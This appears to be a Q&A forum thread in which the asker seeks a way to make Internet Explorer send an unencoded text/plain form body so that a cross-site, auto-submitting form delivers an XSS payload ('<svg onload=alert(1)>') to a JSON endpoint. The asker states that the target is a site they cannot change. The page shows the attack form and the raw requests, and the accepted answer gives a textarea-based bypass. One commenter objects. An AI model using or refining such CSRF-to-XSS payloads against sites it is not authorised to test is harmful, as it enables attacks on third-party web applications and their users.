# How to prevent form body encoding for text/plain in IE

Tags: html, forms, security, internet-explorer, xss

IE11.2848 encodes form body even if I use enctype="text/plain".

```
  <body>
    <form action="/n/jsonxss" method="POST" enctype="text/plain">
      <input type="hidden" name='{"test":"<svg onload=alert(1)>"}' value='{"test":"<svg onload=alert(1)>"}' />
      <input type="submit" value="Submit request" />
    </form>
    <script>document.forms[0].submit()</script>
  </body>
```

The request IE makes:

```
POST /n/jsonxss HTTP/1.1
Content-Type: text/plain
Content-Length: 73
Host: [..]

{%22test%22:%22<svg onload=alert(1)>%22}={"test":"<svg onload=alert(1)>"}
```

The request Chrome makes:

```
POST /n/jsonxss HTTP/1.1
Content-Type: text/plain
Content-Length: 65
Host: [..]

{"test":"<svg onload=alert(1)>"}={"test":"<svg onload=alert(1)>"}
```

How to avoid url encoding for double quotes for "name" attribute in IE11?

This request should be sent from a different domain, so application/json is not an option as it requires a preflight request.

Comment: `text/plain` isn't suitable for anything except debugging (and its a suboptimal way to do that so just never use it). You can't use JSON because you are using a form (preflight requests only apply to Ajax). Just use URL Encoding (it's the default) and change the server to support it.

Comment: It's more a security question how I can perform a xss attack on the target web site. The target server parses the request body as json, no matter what content type is stated in the request header. Obviously, I can't change the target server.

Comment: And preflight requests not only applied to Ajax. If you specify a non-simple enctype (such as "application/json"), the browser will send a CORS preflight request as well.

Comment: "It's more a security question how I can perform a xss attack on the target web site." - don't.

Comment: "If you specify a non-simple enctype (such as "application/json")" … then the browser will ignore it because it is invalid HTML.

Comment: I think there's no way to avoid url encoding and you can decode it on the server side. If you just don't want the encode for double quotes, you can change the <input> tag like this: `name="{'test':'<svg onload=alert(1)>'}" value="{'test':'<svg onload=alert(1)>'}"`.

Answer (score 0, accepted):

The url encoding does not apply if use `<textarea>` instead of `<input>`:

```
<form action="/n/jsonxss" method="POST" enctype="text/plain">
    <textarea name='{"<svg onload=alert(1)>":"'>"}</textarea>
</form>
```